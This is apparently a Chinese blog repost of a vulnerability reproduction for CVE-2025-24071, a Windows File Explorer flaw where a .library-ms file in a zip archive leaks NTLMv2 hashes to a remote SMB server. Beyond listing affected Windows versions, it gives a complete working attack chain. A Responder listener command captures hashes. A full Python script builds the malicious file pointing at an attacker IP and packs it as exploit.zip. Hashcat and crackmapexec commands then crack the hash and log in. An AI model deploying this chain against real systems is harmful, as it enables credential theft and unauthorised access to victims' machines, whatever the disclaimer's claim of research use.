.library-ms
文件并诱导受害者解压时,Windows 文件资源管理器会自动解析该文件内容以生成预览和索引元数据。在此过程中,系统会尝试解析嵌入的SMB路径(例如:\192.168.x.xshared
),从而触发与攻击者控制的服务器之间的 NTLM 认证握手。这一行为会在无需用户交互的情况下,导致受害者的 NTLMv2 哈希被泄露,进而可能被攻击者用于进一步的攻击。-
Version 1809 for both x64 and 32-bit systems -
Version 1607 for x64 and 32-bit -
Version 22H2 (x64, 32-bit, ARM64) -
Version 21H2 for x64, ARM64, and 32-bit
• Windows 11:
-
Version 24H2 for x64 and ARM64 systems -
Version 23H2 for x64 and ARM64 systems -
Version 22H2 for x64 and ARM64 systems
• Windows Server:
-
Windows Server 2025 (Server Core installation and full versions) -
Windows Server 2022 (Server Core installation and full versions) -
Windows Server 2019 and Windows Server 2016 (Server Core installations) -
Windows Server 2012 R2 (Server Core installation and full version)
sudo responder -I eth0 -v
import os
import zipfile
def main():
file_name = input("Enter your file name: ")
ip_address = input("Enter IP (EX: 192.168.1.162): ")
library_content = f"""
<libraryDescriptionxmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\{ip_address}\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""
library_file_name = f"{file_name}.library-ms"
with open(library_file_name, "w", encoding="utf-8") as f:
f.write(library_content)
with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:
zipf.write(library_file_name)
if os.path.exists(library_file_name):
os.remove(library_file_name)
print("completed")
if __name__ == "__main__":
main()
hashcat hash.txt top19576.txt -m 5600
crackmapexec smb 192.168.50.105 -u "vlan" -p "123456"
原文始发于微信公众号(我不懂安全):CVE-2025-24071-windows文件资源管理器欺骗漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论